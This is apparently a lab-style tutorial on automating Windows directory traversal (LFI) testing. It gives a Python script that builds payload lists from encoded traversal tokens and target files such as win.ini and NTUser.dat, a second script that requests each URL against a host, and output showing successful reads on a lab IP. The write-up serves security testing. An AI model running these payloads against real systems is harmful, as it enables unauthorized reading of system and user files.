Introduction

Commonly, when testing for directory traversal on a windows system I spend a significant amount of time manually editing my traversal strings and it takes a while so I automated it.

Tools Needed

We will be using SecLists repository found on github by danielmiessler. Specifically, we are going to be using this file:

Here are the modified contents. For the sake of simplicity in this tool, we will be omitting serveral lines, checking for the existence of a select few files.

C:/Users/Administrator/NTUser.dat
C:/boot.ini
C:/Windows/win.ini
C:/WINNT/win.ini
win.ini

We also need a list of traversal strings that will be used to test for LFI. Something like this:

../
..\
...//

Writing the Code

Our goal here is to get a list of files to request, where we add the traversal strings to the file names to test. We want a list that looks something like:

../C:/Users/Administrator/NTUser.dat
../../C:/Users/Administrator/NTUser.dat
../../../C:/Users/Administrator/NTUser.dat
../../../../C:/Users/Administrator/NTUser.dat
../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../../../../C:/Users/Administrator/NTUser.dat

We want a list of these for each filename we want to check. If we run this through the entire file list, we will have several thousand files to check which could slow things down.

Creating the List of URLs to Test

We write a script that loops over our tokens and our filenames writing them all to a file.

#!/usr/bin/python


# create a list of traversal tokens
tokens = [
        "../",
        "....//",
        "....\\",
        "....\\\\",
        "..\\",
        "..././",
        "..\/",
        "%2e%2e%2f",
        "%252e%252e%252f",
        "%c0%ae%c0%ae%c0%af",
        "%uff0e%uff0e%u2215",
        "%uff0e%uff0e%u2216"
        ]

# create a list of filenames
filenames = [
        "C:/Users/Administrator/NTUser.dat",
        "C:/boot.ini",
        "C:/Windows/win.ini",
        "C:/WINNT/win.ini",
        "win.ini"
        ]


# create traversal strings
def stringify(token, filename):
    strings = []
    for i in range(1, 10):
        string = token * i + filename
        strings.append(string)
    return strings

# loop through each list
for i in tokens:
    for j in filenames:
            # get list of traversal_strings
            traversal_strings = stringify(i, j)
            print traversal_strings
            # write strings to file
            with open('windows-lfi-list.txt', 'a+') as f:
                for s in traversal_strings:
                    f.write("%s\n" % s)
            f.close()

Testing for LFI with our new file list

Now that we have our list we can test to see if we can access any files on a host

We write a pythons script that checks a accepts a file with a list of urls to test and a url

#!/usr/bin/python
# date 2020-06-22
# author kegn

import sys
import requests
import os

def check_files():
    filename = sys.argv[1]
    with open(filename) as f:
        lines = f.read().splitlines()

    base_url = sys.argv[2]
    for i in lines:
        url = base_url + i
        content = requests.get(url)

        if content.status_code == 200:
            print "[*] Found at : " + url
        else:
	    #print "[*] Nothing found - testing next string"
            pass

if len(sys.argv) !=3:
	print "  "
        print "Usage : python lfi-checker filelist-to-check http://10.10.10.10/"
	print "	"
else:
    check_files()
    print "[*] script complete"

Script output:

[root@kadi lfi-checker]# ./lfi-windows.py windows-lfi-list.txt http://10.10.10.184/
[*] Found at : http://10.10.10.184/../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] script complete